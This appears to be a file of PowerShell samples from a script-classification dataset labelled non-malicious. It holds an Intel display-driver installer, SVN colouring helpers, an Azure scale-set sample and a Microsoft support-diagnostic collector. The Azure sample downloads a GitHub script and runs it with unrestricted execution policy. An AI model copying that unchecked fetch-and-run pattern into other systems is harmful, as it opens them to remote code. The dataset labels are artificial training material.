# aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqaJHLVWT9hYwABAAAB
# 6jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE
# MC8GCSqGSIb3DQEJBDEiBCDgQzw/yXFOMV422VGlyW/bs7UdN89vwdb313fZ0dBB
# SjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXjZDR4iwg0ltLANXBh
# 5G1uKqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQg7nz11ub3pAa4gfYo3UIwC9qs
# KURTfBWxHCzibkfg50AwDQYJKoZIhvcNAQELBQAEggIAE5uXKWg0PKgkn5nzje94
# BHa8Sw1BHEzmKHTlf1AMr+S8O21IBI2qO8E1nAwb/HxSnVk9cXonOp60yeQiBUkB
# f2LqxmAEkskZs//0NYVkkzV2X+60TfEMBdryO0vejqE7WBrHZ3xlwuY79yyZ4rw+
# K3vTTcrSOK4aDyVGyZIWD4Xlmbfa25NKOA7/HY7GRNI1ZSWKvye1rKroEUHFWdDV
# wJEkdIdM6LighY0nE9aoNh19wz+l9QkNQeIlyTLEIZSOrqaOlTfU67igCNvl6JZ+
# yWrBHRw7tUexN0ZlUKkdItqk3HF76q2ZrjyGdwxqKlFc3tqs4qJa8GhzFirrAcPC
# Te5dv4/VK5rgRdMOnqkcFZ/Mt7vOTotfh7Z57RYdfjY2ofQAlLy2/42JsXjhJfUn
# 3+0CkePs5hIXMiJBoYwtaDDKAHn3Fxcm+99p/UhYyUOddP395qdl1ANUsKjuk73i
# qCzqgfIadvWkI9rSOnNaoyCSwoJNvNbh1tSTR7sdm6qVnH0uma2XcW8JzPNvdOep
# PKBfma1pgsN1ihAePuGIAezQfNmo/3WCe4nNvU2YQaQEgskOL+Z9senqz/gxHKsp
# L+yCjkcT7UnR0DdGioZvhFzDBh+lkQukpEebTcrT2yQroXQ0lrOUY6EEDIWFa24f
# eIS3LoFyAW/Zxrlg5Edp8uk=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_13_53.ps1
|
sample_13_53.ps1
|
#===========================================================================
#DVApp.ps1
#----------------------------------------------------------------------------
#Copyright (C) 2021 Intel Corporation
#SPDX-License-Identifier: MIT
#--------------------------------------------------------------------------*/
param ($param1)
#This API will validate the input command line params
function validate_input_params($param1)
{
if (($param1 -eq "setup") -or ($param1 -eq "run")) {
Write-Host "Input parameters are valid, continuing..."
}
else {
Write-Host "Input parameters are invalid, try > DVApp.ps1 run (or) DVApp.ps1 setup"
Write-Host "Exiting from powershell script..."
return "FAIL"
}
return "SUCCESS"
}
#check if file present
function is_present($filepath)
{
$isavailable = Test-Path $filepath
return $isavailable
}
#check if all the required binaries are present or not
function check_executables()
{
if ((is_present("DVServer\dvserver.cat") -eq $true) -and
(is_present("DVServer\DVServer.dll") -eq $true) -and
(is_present("DVServer\DVServer.inf") -eq $true) -and
(is_present("DVEnabler.exe") -eq $true) -and
(is_present("DVServerUMD_Node.exe") -eq $true)){
return "SUCCESS"
}
Write-Host "Setup files doesn't exist.. Exiting.."
return "FAIL"
}
#This API will create the IDD display node and turn off MSFT display path
function create_node()
{
if(Get-Process | Where Name -eq DVServerUMD_Node) {
Write-Host "DVServerUMD Process is already running..."
return "FAIL"
}
Write-Host "Creating DVServer UMD node"
Start-Process ".\DVServerUMD_Node.exe" -WindowStyle Hidden
Start-Sleep -s 3
Write-Host "Turning off MSFT Path"
& ".\DVEnabler.exe"
if ($LASTEXITCODE -eq 0) {
return "SUCCESS"
} else {
Write-Host "DVEnabler failed. DVServerUMD has not taken over MSBDA!"
return "FAIL"
}
}
#This API will execute the setup/run commands
function execute_command($param1)
{
if ( $param1 -eq "setup") {
Write-Host "Installing new DVServer UMD driver into the Kernel PnP tree..."
pnputil.exe /add-driver DVServer\DVServer.inf /install
$ret = create_node
if ($ret -eq "FAIL") {
return "FAIL"
}
else {
return "SUCCESS"
}
}
if ( $param1 -eq "run") {
$ret = create_node
if ($ret -eq "FAIL") {
return "FAIL"
}
else {
return "SUCCESS"
}
}
}
##Main##
$inputval = $param1
$ret = validate_input_params($inputval)
if ($ret -eq "FAIL") {
Exit
}
$ret = check_executables
if ($ret -eq "FAIL") {
Exit
}
$ret = execute_command($inputval)
if ($ret -eq "FAIL") {
Exit
}
Write-Host "Exiting Powershell Script Successfully..."
|
combined_dataset/train/non-malicious/Colorize Subversion SVN_4.ps1
|
Colorize Subversion SVN_4.ps1
|
# detect source control management software
function findscm {
$scm = ''
:selectscm foreach ($_ in @('svn', 'hg')) {
$dir = (Get-Location).Path
while ($dir.Length -gt 3) {
if (Test-Path ([IO.Path]::combine($dir, ".$_"))) {
$scm = $_
break selectscm
}
$dir = $dir -Replace '\\\\[^\\\\]+$', ''
}
}
return $scm
}
# draw output
function drawlines($colors, $cmd) {
$scm = findscm
if (!$cmd -or !$scm) { return }
foreach ($line in (&$scm $cmd)) {
$color = $colors[[string]$line[0]]
if ($color) {
write-host $line -Fore $color
} else {
write-host $line
}
}
}
# svn stat
function st {
drawlines @{ "A"="Magenta"; "D"="Red"; "C"="Yellow"; "G"="Blue"; "M"="Cyan"; "U"="Green"; "?"="DarkGray"; "!"="DarkRed" } "stat"
}
# svn update
function su {
drawlines @{ "A"="Magenta"; "D"="Red"; "U"="Green"; "C"="Yellow"; "G"="Blue"; } "up"
}
# svn diff
function sd {
drawlines @{ "@"="Magenta"; "-"="Red"; "+"="Green"; "="="DarkGray"; } "diff"
}
|
combined_dataset/train/non-malicious/830.ps1
|
830.ps1
|
$cred = Get-Credential
New-AzVmss `
-ResourceGroupName "myResourceGroup" `
-VMScaleSetName "myScaleSet" `
-Location "EastUS2" `
-VirtualNetworkName "myVnet" `
-SubnetName "mySubnet" `
-PublicIpAddressName "myPublicIPAddress" `
-LoadBalancerName "myLoadBalancer" `
-UpgradePolicyMode "Automatic" `
-Credential $cred `
-Zone "1", "2", "3"
$publicSettings = @{
"fileUris" = (,"https://raw.githubusercontent.com/Azure-Samples/compute-automation-configurations/master/automate-iis.ps1");
"commandToExecute" = "powershell -ExecutionPolicy Unrestricted -File automate-iis.ps1"
}
$vmss = Get-AzVmss `
-ResourceGroupName "myResourceGroup" `
-VMScaleSetName "myScaleSet"
Add-AzVmssExtension -VirtualMachineScaleSet $vmss `
-Name "customScript" `
-Publisher "Microsoft.Compute" `
-Type "CustomScriptExtension" `
-TypeHandlerVersion 1.8 `
-Setting $publicSettings
Update-AzVmss `
-ResourceGroupName "myResourceGroup" `
-Name "myScaleSet" `
-VirtualMachineScaleSet $vmss
Get-AzPublicIpAddress -ResourceGroupName "myResourceGroup" | Select IpAddress
|
combined_dataset/train/non-malicious/sample_4_46.ps1
|
sample_4_46.ps1
|
# 2023-02-24 WalterE mod Trap #we#
$startTime_AutoAdd = Get-Date
trap [Exception]{
WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue
Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_"
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Common ---"
# version of the psSDP Diagnostic
Run-DiagExpression .\DC_NetworkingDiagnostic.ps1
# MSInfo
Run-DiagExpression .\DC_MSInfo.ps1
# Obtain pstat output
Run-DiagExpression .\DC_PStat.ps1
# CheckSym
Run-DiagExpression .\DC_ChkSym.ps1
# AutoRuns Information
Run-DiagExpression .\DC_Autoruns.ps1
# Collects Windows Server 2008/R2 Server Manager Information
Run-DiagExpression .\DC_ServerManagerInfo.ps1
# List Schedule Tasks using schtasks.exe utility
Run-DiagExpression .\DC_ScheduleTasks.ps1
# Collects System and Application Event Logs
Run-DiagExpression .\DC_SystemAppEventLogs.ps1
# Collect Machine Registry Information for Setup and Performance Diagnostics
Run-DiagExpression .\DC_RegistrySetupPerf.ps1
# GPResults.exe Output
Run-DiagExpression .\DC_RSoP.ps1
# Collects information about Driver Verifier (verifier.exe utility)
Run-DiagExpression .\DC_Verifier.ps1
# Collects BCD information via BCDInfo tool or boot.ini
Run-DiagExpression .\DC_BCDInfo.ps1
# Obtain information about Devices and connections using devcon.exe utility
Run-DiagExpression .\DC_Devcon.ps1
# DBErr Data Collector
Run-DiagExpression .\DC_DBErr.ps1
# User Rights (privileges) via the userrights.exe tool
Run-DiagExpression .\DC_UserRights.ps1
# WhoAmI
Run-DiagExpression .\DC_Whoami.ps1
# PoolMon
Run-DiagExpression .\DC_PoolMon.ps1
# Collects registry entries for KIR (for 2019) and RBC (for 2016)
Run-DiagExpression .\DC_KIR-RBC-RegEntries.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Net ---"
# DHCP Client Component
Run-DiagExpression .\DC_DhcpClient-Component.ps1
# DNS Client Component
Run-DiagExpression .\DC_DNSClient-Component.ps1
# Firewall
Run-DiagExpression .\DC_Firewall-Component.ps1
# IPsec
Run-DiagExpression .\DC_IPsec-Component.ps1
# NetLBFO
Run-DiagExpression .\DC_NetLBFO-Component.ps1
# RPC
Run-DiagExpression .\DC_RPC-Component.ps1
# SMB Client Component
Run-DiagExpression .\DC_SMBClient-Component.ps1
# SMB Server Component
Run-DiagExpression .\DC_SMBServer-Component.ps1
# TCPIP Component
Run-DiagExpression .\DC_TCPIP-Component.ps1
# WINSClient
Run-DiagExpression .\DC_WINSClient-Component.ps1
# Collects W32Time information
Run-DiagExpression .\DC_W32Time.ps1 -LogType "Basic"
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: HyperV ---"
# Hyper-V Networking Settings
Run-DiagExpression .\DC_HyperVNetworking.ps1
# Hyper-V Network Virtualization
Run-DiagExpression .\DC_HyperVNetworkVirtualization.ps1
# Collect the VMGuestSetup.Log file
Run-DiagExpression .\DC_VMGuestSetupLogCollector.ps1
# Information about Hyper-V, including Virtual Machine Files and Hyper-V Event Logs
Run-DiagExpression .\DC_HyperVFiles.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: DOM ---"
# Applied Security Templates
Run-DiagExpression .\DC_AppliedSecTempl.ps1
# Collects functional level and local group membership information (DSMisc)
Run-DiagExpression .\DC_DSMisc.ps1
# Obtain Netlogon Log
Run-DiagExpression .\DC_NetlogonLog.ps1
# Collects NetSetup.Log from %windir%\debug
Run-DiagExpression .\DC_NetSetupLog.ps1
# Collects winlogon Log from %windir%\security\logs\winlogon.log
Run-DiagExpression .\DC_WinlogonLog.ps1
# Run Repadmin tool with showrepl argument and obtain output
Run-DiagExpression .\DC_Repadmin.ps1
# Collects system security settings (INF) via secedit utility
Run-DiagExpression .\DC_SystemSecuritySettingsINF.ps1
# Collects registry entries for Directory Services support
Run-DiagExpression .\DC_DSRegEntries.ps1
# auditpol output
Run-DiagExpression .\DC_AuditPol.ps1
# Kerberos tickets and TGT via klist utility
Run-DiagExpression .\DC_KList.ps1
# DCPromo Logs
Run-DiagExpression .\DC_DCPromoLogs.ps1
# Determines FSMO role owners
Run-DiagExpression .\DC_NetdomFSMO.ps1
# Copies Userenv Log files
Run-DiagExpression .\DC_UserenvLogs.ps1
# Collects environment variables (output of SET command)
Run-DiagExpression .\DC_EnvVars.ps1
# Collecting Secure Channel Info
Run-DiagExpression .\DC_SecureChannelInfo.ps1
# Dfsr Informaton
Run-DiagExpression .\DC_DfsrInfo.ps1
# BPA DS
if ($Global:skipBPA -ne $true) { Run-DiagExpression .\DC_BPA-DS.ps1 }
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Print ---"
# Collect Print Registry Keys
Run-DiagExpression .\DC_RegPrintKeys.ps1
# Perf/Printing Event Logs
Run-DiagExpression .\DC_PerfPrintEventLogs.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Storage ---"
# By adding San.exe to the SDP manifest we should be able to solve cases that have a 512e or Advanced Format (4K) disk in it faster.
Run-DiagExpression .\DC_SanStorageInfo.ps1
# Collects Fiber Channel information using fcinfo utility
Run-DiagExpression .\DC_FCInfo.ps1
# Obtain information about MS-DOS device names (symbolic links) via DOSDev utility
Run-DiagExpression .\DC_DOSDev.ps1
# Collects Information about iSCSI though the iscsicli utility
Run-DiagExpression .\DC_ISCSIInfo.ps1
# Parse Storage related event logs on System log using evParse.exe and dump to a HTML file
Run-DiagExpression .\DC_EvParser.ps1
# Collects VSS information via VSSAdmin tool
Run-DiagExpression .\DC_VSSAdmin.ps1
# Collect Machine Registry Information for Storage Related Diagnostics
Run-DiagExpression .\DC_RegistryStorage.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: WinRM ---"
# Collects Windows Remote Management Event log
Run-DiagExpression .\DC_WinRMEventLogs.ps1
# Collects WSMAN and WinRM binary details info
Run-DiagExpression .\DC_WSMANWinRMInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Update ---"
# Update History
Run-DiagExpression .\DC_UpdateHistory.ps1
# Collect WindowsUpdate.Log
Run-DiagExpression .\DC_WindowsUpdateLog.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Cluster ---"
# Export cluster resources properties to a file (2K8 R2 and newer)
Run-DiagExpression .\DC_ClusterResourcesProperties.ps1
# Collects Cluster Groups Resource Dependency Report (Win2K8R2)
Run-DiagExpression .\DC_ClusterDependencyReport.ps1
# Collects Cluster - related Event Logs for Cluster Diagnostics
Run-DiagExpression .\DC_ClusterEventLogs.ps1
# Collects \windows\cluster\reports contents (MHT, XML and Validate*.LOG)
Run-DiagExpression .\DC_ClusterReportsFiles.ps1
# Collects Cluster - related registry keys
Run-DiagExpression .\DC_RegistryCluster.ps1
# Information about Windows 2008 R2 Cluster Shared Volumes
Run-DiagExpression .\DC_CSVInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Performance Data ---"
# Performance Monitor - System Performance Data Collector
Run-DiagExpression .\TS_PerfmonSystemPerf.ps1 -NumberOfSeconds 60 -DataCollectorSetXMLName "SystemPerformance.xml"
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Remote ---"
# ServerCore R2 Setup
#Run-DiagExpression .\DC_ServerCoreR2Setup.ps1
# NetworkAdapters
Run-DiagExpression .\DC_NetworkAdapters-Component.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase: Done ---"
Write-Host "...Next step: Troubleshooting section, if it hangs, run script with parameter SkipTS"
if ($Global:skipTS -ne $true) {
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_common ---"
Run-DiagExpression .\TS_DumpCollector.ps1 -CopyWERMinidumps -CopyMachineMiniDumps -MaxFileSize 300 -CopyMachineMemoryDump
# Detects and alerts evaluation media
Run-DiagExpression .\TS_EvalMediaDetection.ps1
# Debug/GFlags check
Run-DiagExpression .\TS_DebugFlagsCheck.ps1
# Information about Processes resource usage and top Kernel memory tags
Run-DiagExpression .\TS_ProcessInfo.ps1
# RC_32GBMemoryKB2634907
Run-DiagExpression .\RC_32GBMemoryKB2634907.ps1
# Checking if Registry Size Limit setting is present on the system
Run-DiagExpression .\TS_RegistrySizeLimitCheck.ps1
# Running powercfg.exe to obtain power settings information
Run-DiagExpression .\TS_PowerCFG.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Net ---"
# Check for ephemeral port usage
Run-DiagExpression .\TS_PortUsage.ps1
# RC_KB2647170_CnameCheck
Run-DiagExpression .\RC_KB2647170_CnameCheck.ps1
# FirewallCheck
Run-DiagExpression .\RC_FirewallCheck.ps1
# IPv66To4Check
Run-DiagExpression .\RC_IPv66To4Check.ps1
# RC_HTTPRedirectionTSGateway
Run-DiagExpression .\RC_HTTPRedirectionTSGateway.ps1
# [Idea ID 6530] [Windows] Check for any configured RPC port range which may cause issues with DCOM or DTC components
Run-DiagExpression .\TS_RPCPortRangeCheck.ps1
# [Idea ID 2387] [Windows] Verify if RPC connection a configured to accept only Authenticated sessions
Run-DiagExpression .\TS_RPCUnauthenticatedSessions.ps1
# SMB2ClientDriverStateCheck
Run-DiagExpression .\TS_SMB2ClientDriverStateCheck.ps1
# SMB2ServerDriverStateCheck
Run-DiagExpression .\TS_SMB2ServerDriverStateCheck.ps1
# Opportunistic Locking has been disabled and may impact performance.
Run-DiagExpression .\TS_LockingKB296264Check.ps1
# Evaluates whether InfocacheLevel should be increased to 0x10 hex. To resolve slow logon, slow boot issues.
Run-DiagExpression .\TS_InfoCacheLevelCheck.ps1
# RSASHA512 Certificate TLS 1.2 Compat Check
Run-DiagExpression .\TS_DetectSHA512-TLS.ps1
# IPv6Check
Run-DiagExpression .\TS_IPv6Check.ps1
# PMTU Check
Run-DiagExpression .\TS_PMTUCheck.ps1
# Checks for modified TcpIP Reg Parameters and recommend KB
Run-DiagExpression .\TS_TCPIPSettingsCheck.ps1
# 'Checks if the number of 6to4 adapters is larger than the number of physical adapters
Run-DiagExpression .\TS_AdapterKB980486Check.ps1
# Checks files in the LanmanServer, if any at .PST files a file is created with listing all of the files in the directory
Run-DiagExpression .\TS_NetFilePSTCheck.ps1
# Checks if Windows Server 2008 R2 SP1, Hyper-V, and Tunnel.sys driver are installed if they are generate alert
Run-DiagExpression .\TS_ServerCoreKB978309Check.ps1
# DetectLowPathMTU
#_# Run-DiagExpression .\TS_DetectLowPathMTU.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_HyperV ---"
# Hyper-V Info 2008R2
Run-DiagExpression .\TS_HyperVInfo.ps1
# Detect Virtualization
Run-DiagExpression .\TS_Virtualization.ps1
if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\Hyper-V) {
# Hyper-V BPA
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/Hyper-V" -OutputFileName ($Computername + "_HyperV_BPAInfo.HTM") -ReportTitle "Hyper-V Best Practices Analyzer"
}
}
# [Idea ID 6134] [Windows] You cannot start Hyper-V virtual machines after you enable the IO verification option on a HyperV
Run-DiagExpression .\TS_HyperVCheckVerificationKB2761004.ps1
# Check for event ID 21203 or 21125
Run-DiagExpression .\TS_CheckEvtID_KB2475761.ps1
# [Idea ID 5438] [Windows] Windows 2012 Hyper-V SPN and SCP not registed if customer uses a non default dynamicportrange
Run-DiagExpression .\TS_HyperVEvent14050Check.ps1
# [Idea ID 5752] [Windows] BIOS update may be required for some computers before starting Hyper-V on 2012
Run-DiagExpression .\TS_HyperV2012-CS-BIOS-Check.ps1
# Hyper-V KB 982210 check
Run-DiagExpression .\TS_HyperVSCSIDiskEnum.ps1
# Hyper-V KB 975530 check (Xeon Processor Errata)
Run-DiagExpression .\TS_HyperVXeon5500Check.ps1
# Checks if Windows Server 2008 R2 SP1, Hyper-V, and Hotfix 2263829 are installed if they are generate alert
Run-DiagExpression .\TS_HyperVKB2263829Check.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_DOM ---"
# DCDiag information
Run-DiagExpression .\TS_DCDiag.ps1
# Check AD Replication Status
Run-DiagExpression .\TS_ADReplCheck.ps1
# Checks if CrashOnAuditFail is either 1 or 2
Run-DiagExpression .\TS_CrashOnAuditFailCheck.ps1
# SYSVOL and/or NETLOGON shares are missing on domain controller
Run-DiagExpression .\TS_LSASSHighCPU.ps1
# SYSVOL and/or NETLOGON shares are missing on domain controller
Run-DiagExpression .\TS_SysvolNetLogonShareCheck.ps1
# Missing Rid Set reference attribute detected
Run-DiagExpression .\TS_ADRidSetReferenceCheck.ps1
# AD Integrated DNS Server should not point only to itself if it has replica partners.
Run-DiagExpression .\TS_DCCheckDnsExclusiveToSelf.ps1
# [Idea ID 3768] [Windows] New rule to verify USN Roll Back
Run-DiagExpression .\TS_USNRollBackCheck.ps1
# [Idea ID 2882] [Windows] The stop of Intersite Messaging service on ISTG causes DFSN cannot calculate site costs
Run-DiagExpression .\TS_IntersiteMessagingStateCheck.ps1
# [Idea ID 2831] [Windows] DFSR Reg setting UpdateWorkerThreadCount = 64 may cause hang
Run-DiagExpression .\TS_DfsrUpdateWorkerThreadCountCheck.ps1
# [Idea ID 2593] [Windows] UDP 389 on DC does not respond
Run-DiagExpression .\TS_IPv6DisabledonDCCheck.ps1
# [Idea ID 4724] [Windows] W32Time and time skew
Run-DiagExpression .\TS_Win32TimeTimeSkewRegCheck.ps1
# [Idea ID 4796] [Windows] MaxConcurrentApi Problem Detection Lite
Run-DiagExpression .\TS_MCALite.ps1
# [Idea ID 5009] [Windows] Weak Key Block Detection
Run-DiagExpression .\TS_DetectWeakKeys.ps1
# [Idea ID 6816] [Windows] Detect Certificate Root Store Size Problems
Run-DiagExpression .\TS_DetectRootSize.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Print ---"
# Print Information Report
Run-DiagExpression .\TS_PrintInfo.ps1
# [KSE Rule] [ Windows V3] Presence of lots of folders inside \spool\prtprocs\ causes failure to install print queues
Run-DiagExpression .\TS_PrtprocsSubfolderBloat.ps1
# Checks if machine is server 2008 R2 sp0 or sp1, and event log 602 exists, and hotfix kb 2457866 is installed if true generate alert
Run-DiagExpression .\TS_PrinterKB2457866Check.ps1
# Checks if a Kyocera print driver is installed then checks if KB982728 is installed
Run-DiagExpression .\TS_PrinterKB982728Check.ps1
# Checks if Point and Print Restriction Policy and then look for specifc events on event logs
Run-DiagExpression .\TS_PrinterKB2618460Check.ps1
# Checks to see if HP Standard TCP/IP Port key is present on the system
Run-DiagExpression .\TS_PrintingHPTCPMonCheck.ps1
# Checking if 'Net Driver HPZ12' or 'Pml Driver HPZ12' is one of the installed services and startup type is something different than Disabled
Run-DiagExpression .\TS_HPZ12ServiceCheck.ps1
# Detect the OEM HP driver hpzui4wm.DLL
Run-DiagExpression .\TS_PrintHpzui4wmCheck.ps1
# Check for the presence of Zenographics Device Manager User Interface
Run-DiagExpression .\TS_Check_ZenographicsUI.ps1
# Check for upgrade from HP UPD 5.2 to 5.3
Run-DiagExpression .\TS_2628581_HPUPDUpgrade.ps1
# [Idea ID 2226] [Windows] Old SHD and SPL files residual in the Spool directory cause issues
Run-DiagExpression .\TS_PrintSpoolerOldSPLSHD.ps1
# [Idea ID 1872] [Windows] Detecting bloated HKEY_USERS\.default\printers\Devmodes2 registry key on Terminal servers
Run-DiagExpression .\TS_PrintDevModes2CountCheck.ps1
# [Idea ID 3462] [Windows] Printing issue - multiple SETxnnn.tmp files
Run-DiagExpression .\TS_PrintSetTMPSystem32Check.ps1
# [Idea ID 4091] [Windows] frequent spooler crash due to zsdnt5ui.dll
Run-DiagExpression .\TS_PrintZSDDMUICheck.ps1
# [Idea ID 4168] [Windows] Check for existence of 2647753 for printing issues
Run-DiagExpression .\TS_Win7PrintUpdateRollupCheck.ps1
# [Idea ID 2374] [Windows] Spooler service hangs since CSR exhausts the 512 threads in thread pool
Run-DiagExpression .\TS_PrintCSRBloatingCheck.ps1
# [Idea ID 4805] [Windows] Printers show Offline on Windows 7 clients
Run-DiagExpression .\TS_PrinterShowOffline.ps1
# [Idea ID 5470] [Windows] GPP printer fails to add with error code 0x80070704
Run-DiagExpression .\TS_GPPDeployPrinterCheck.ps1
# [Idea ID 6863] [Windows] GPP printer fails to be added since LocalEnumForms returns error 8007007a
Run-DiagExpression .\TS_GPPMapPrinterKB2797136.ps1
# [KSE Rule] [ Windows V3] HKCU\Software\Hewlett-Packard registry hive increases in size on Citrix servers
Run-DiagExpression .\TS_HPPrinterDriverVersionCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_RDP ---"
# Checking the presence of Citrix AppSense 8.1
Run-DiagExpression .\TS_CitrixAppSenseCheck.ps1
# Check for large number of Inactive Terminal Server ports
Run-DiagExpression .\TS_KB2655998_InactiveTSPorts.ps1
# [Idea ID 2285] [Windows] Windows Server 2003 TS Licensing server does not renew new versions of TS Per Device CALs
Run-DiagExpression .\TS_RemoteDesktopLServerKB2512845.ps1
if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\TerminalServices) {
# BPA RDP
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/TerminalServices" -OutputFileName ($Computername + "_TS_BPAInfo.HTM") -ReportTitle "Terminal Services Best Practices Analyzer"
}
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Storage ---"
# Detect 4KB Drives (Disk Sector Size)
Run-DiagExpression .\TS_DriveSectorSizeInfo.ps1
# [Idea ID 7345] [Windows] Perfmon - Split IO Counter
Run-DiagExpression .\TS_DetectSplitIO.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Setup ---"
# [Idea ID 1911] [Windows] NTFS metafile cache consumes most of RAM in Win2k8R2 Server
Run-DiagExpression .\TS_NTFSMetafilePerfCheck.ps1
# [Idea ID 2346] [Windows] high cpu only on one processor
Run-DiagExpression .\TS_2K3ProcessorAffinityMaskCheck.ps1
# [Idea ID 3989] [Windows] STACK MATCH - Win2008R2 - Machine hangs after shutdown, caused by ClearPageFileAtShutdown setting
Run-DiagExpression .\TS_SBSLClearPageFileAtShutdown.ps1
# [Idea ID 2753] [Windows] HP DL385 G5p machine cannot generate dump file
Run-DiagExpression .\TS_ProLiantDL385NMICrashDump.ps1
# [Idea ID 3253] [Windows] Windows Search service does not start immediately after the machine is booted
Run-DiagExpression .\TS_WindowsSearchLenovoRapidBootCheck.ps1
# [Idea ID 2334] [Windows] W2K3 x86 SP2 server running out of paged pool due to D2d tag
Run-DiagExpression .\TS_KnownKernelTags.ps1
# [Idea ID 3317] [Windows] DisableEngine reg entry can cause app install or registration failure
Run-DiagExpression .\TS_AppCompatDisabledCheck.ps1
# [Idea ID 2357] [Windows] the usage of NPP is very large for XTE.exe
Run-DiagExpression .\TS_XTENonPagedPoolCheck.ps1
# [Idea ID 4368] [Windows] Windows Logon Slow and Explorer Slow
Run-DiagExpression .\TS_2K3CLSIDUserACLCheck.ps1
# [Idea ID 4649] [Windows] Incorrect values for HeapDecomitFreeBlockThreshold causes high Private Bytes in multiple processes
Run-DiagExpression .\TS_HeapDecommitFreeBlockThresholdCheck.ps1
# [Idea ID 2056] [Windows] Consistent Explorer crash due to wsftpsi.dll
#_# Run-DiagExpression .\TS_WsftpsiExplorerCrashCheck.ps1
# [Idea ID 3250] [Windows] Machine exhibits different symptoms due to Confliker attack
Run-DiagExpression .\TS_Netapi32MS08-067Check.ps1
# [Idea ID 5194] [Windows] Unable to install vcredist_x86.exe with message (Required file install.ini not found. Setup will now exit)
Run-DiagExpression .\TS_RegistryEntryForAutorunsCheck.ps1
# [Idea ID 5452] [Windows] The “Red Arrow” issue in Component Services caused by registry keys corruption
Run-DiagExpression .\TS_RedArrowRegistryCheck.ps1
# [Idea ID 5603] [Windows] Unable to start a service due to corruption in the Event Log key
Run-DiagExpression .\TS_EventLogServiceRegistryCheck.ps1
# [Idea ID 4783] [Windows] eEye Digital Security causing physical memory depletion
Run-DiagExpression .\TS_eEyeDigitalSecurityCheck.ps1
# [Idea ID 5091] [Windows] Super Rule-To check if both 3GB and PAE switch is present in boot.ini for a 32bit OS (Pre - Win 2k8)
Run-DiagExpression .\TS_SwithesInBootiniCheck.ps1
# [Idea ID 7018] [Windows] Event Log Service won't start
Run-DiagExpression .\TS_EventLogStoppedGPPCheck.ps1
# [Idea ID 8012] [Windows] SDP-UDE check for reg key DisablePagingExecutive
